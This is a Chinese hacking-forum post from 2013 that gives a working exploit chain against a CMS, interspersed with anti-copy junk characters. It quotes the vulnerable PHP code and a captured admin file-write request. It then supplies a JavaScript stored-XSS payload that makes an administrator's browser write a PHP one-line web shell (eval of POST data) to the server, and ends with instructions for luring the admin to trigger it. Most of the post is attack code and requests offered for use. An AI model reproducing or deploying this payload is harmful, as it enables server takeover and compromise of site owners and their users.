|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题, z5 B: B- g. R2 C: A3 V% Y$ ~0 J
官网已经修补了,所以重新下了源码; {& \/ D6 x% o+ f3 l" L
因为 后台登入 还需要认证码 所以 注入就没看了。8 x% \" X2 _# k9 n9 k v/ R* F
存在 xss
9 | }. Z" S) d8 l# {漏洞文件 user/member/skin_edit.php
" }9 Q+ W6 J& N* J/ `本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:7 s5 h; X& e/ N! I
$ z( @) c. }) T3 V2 F) T/ U</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
- E$ q7 t; D' P4 a2 ?! T a2 c/ ~1 _ 8 b Q p( z9 Q0 h7 ?8 V
</textarea></td></tr>& a( C6 |* u+ f& k
, A* t& h1 ~7 J% h9 z( t G user/do.php ) O' `3 e, A. o
' H n; K) Z" i
+ q0 I/ d# ^ t$ c% J# F
if($op=='zl'){ //资料# F, K" k6 x8 w& r' O% {4 {0 t4 Y
% D% L3 V) r( q" @# R4 {! x5 n
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
( U, M2 n) J9 p" b6 h& ] exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
# E4 q! e8 o: B- p/ T ' B& m, Y. X+ S6 U
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',- n6 o+ i+ W$ }2 c4 E
7 I$ _0 B' s: w( [( E: i2 v0 k
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
/ @; ?/ n0 g( [) W4 h. O where CS_Name='".$cscms_name."'";
+ W2 [5 u, m% Q6 c
; X7 B, r, p, x& r2 H( N& |, L: V if($db->query($sql)){
; r, o3 q. a9 g) C( Y6 G {& C
' B5 }8 \2 y3 Q M% ?. x exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));) X3 H4 C6 V* |' T
- Q, R6 F5 A% V/ `1 R- F( u" m }else{- O& o, l: a* x% ^) @3 g6 S
0 O2 G4 G/ X% g5 }* ^) O exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 x# f! l9 Z$ D9 [' u4 ?
. I9 l9 M+ ^3 z" J+ u }# k6 \; N+ n) P0 w7 n0 m7 o& g
W% E/ Q* h+ i) t4 c F
/ ?7 q+ G4 w! i& T' ?没有 过滤导致xss产生。$ s# \# d/ Y% s, l3 ]
后台 看了下 很奇葩的是可以写任意格式文件。。3 t! m/ \* m+ u* L/ o, _' l2 o- t
抓包。。 e% j p- r: \3 X4 f" g. X2 y
) A# d5 @# u' f) |3 t7 _ O" ?0 w8 `3 u7 P5 V* a5 u8 E5 j# ~& E, a
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
1 W- d3 i. a& l3 y/ l0 ?/ b
( J" P p; @2 Z" J/ P: ZAccept: text/html, application/xhtml+xml, */*' T' N. ^/ j, d% G& G; e8 K$ S
0 s" x+ [- ]+ lReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; s7 }" [" s% S& O* e) i
$ b- K1 f) L3 n8 n& A
Accept-Language: zh-CN, M. x- \% H, p6 d8 J# C
. j* k" v1 H; T& p R5 r' ~+ K
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
6 y: T5 F# E5 a1 {7 s9 L7 ? ! h3 ]& e: j! p' D7 B
Content-Type: application/x-www-form-urlencoded
' k- n+ r, d' D1 n4 U0 _ ; Z7 ]. `( {2 l: V7 d, y5 U
Accept-Encoding: gzip, deflate
0 f3 y7 x& J0 }' @ 6 o$ C. z: c& `5 v5 b
Host: 127.0.0.13 ]2 u q8 W* y* Z
A9 b4 _0 y7 K! P; b+ o
Content-Length: 38
/ {; G; ?1 n! F6 B 6 f8 ~9 `" t: t1 C* D3 D) ^7 q
DNT: 1- R1 J. l, |! S* }
0 }$ L* A+ F' g5 q. |: u) ~
Connection: Keep-Alive
) s8 l! M: J* X8 i) k4 t+ m / {; c! w1 M+ D' t6 u: ^/ z
Cache-Control: no-cache+ F2 u' |4 L; n* [/ G. u9 N& F
, u, B/ o' L- |2 T$ oCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; |( z* Z. d! K; q
! R$ y: N' \! |1 ?$ H" F7 s
" [. ^8 {; n. d; Z! tname=aaa.php&content=%3Cs%3E%3Ca%25%3E# n1 ^( R6 x* W) x
! K8 E) x; i! k, C: E
1 O5 J5 ^) y; e. x3 G8 `: h s) N' `3 M: b) }2 g
于是 构造js如下。
R6 o7 w d1 p+ y# d
( i# q# l8 v; z+ l x6 W本帖隐藏的内容<script>
# q5 I: n% l$ H; ~- JthisTHost = top.location.hostname;
6 L2 C2 A8 Y% ^2 \9 T
- Q E: q4 c- L K1 ~. v$ WthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";) p5 L, P. V" r) m; u* j, V' G
7 V2 t1 B# x5 O7 e+ b& K+ {function PostSubmit(url, data, msg) {
3 B2 y( \, f- ?8 m8 Z+ l; p var postUrl = url;$ T. w# k3 X. n6 k- Y
2 `2 w5 L; D8 b* j( a" Z var postData = data;
6 @$ Z4 `2 m5 A2 E2 a4 g var msgData = msg; 6 U& n8 d. P" ]4 @& D e3 h
var ExportForm = document.createElement("FORM");
" Y& D# d. f q5 {9 e" t0 p document.body.appendChild(ExportForm); ' V# E1 J9 ~0 L. Y: c
ExportForm.method = "POST";
, J; V. @. t7 y& g var newElement = document.createElement("input"); ! T- Q t1 r3 f1 {) h
newElement.setAttribute("name", "name"); ; I- I8 P7 e" E7 W* b
newElement.setAttribute("type", "hidden");
( H6 `0 r9 Z% G8 L. r* Q var newElement2 = document.createElement("input"); * j5 K4 O% ?9 N9 C& Z- V
newElement2.setAttribute("name", "content");
! v% l5 c1 b1 f# `0 ]0 |, u newElement2.setAttribute("type", "hidden");
6 b" W9 x6 F% J# A# D$ M/ [7 f& K8 ^ ExportForm.appendChild(newElement); 3 R0 S6 Q8 D/ {' U
ExportForm.appendChild(newElement2); 8 [, Q3 B* R" z9 C6 _
newElement.value = postData; 0 ~, u5 S/ x4 \
newElement2.value = msgData;
4 f) p/ |0 ?% Z% M; j: F ExportForm.action = postUrl;
& ^6 k" u& Y0 _1 S ExportForm.submit(); 1 J! J. J5 e; c9 v
};( Q3 c1 L* ^( l7 U
! F( \' d. o- EPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
r" ?) u4 p; k4 N/ U9 {; Z 5 j* K1 S* d+ g+ N# n: C
</script>" w6 h% Y3 m T9 ?6 y. B+ q
* ~, N& \4 B: \: j% A1 Q1 R
+ ?3 N& H* c/ W9 _+ f4 ?2 x2 u
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入& t# G2 }4 ~, Z
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) N: Y: n% t2 W) |
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
3 C+ t/ w6 r( f; @
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对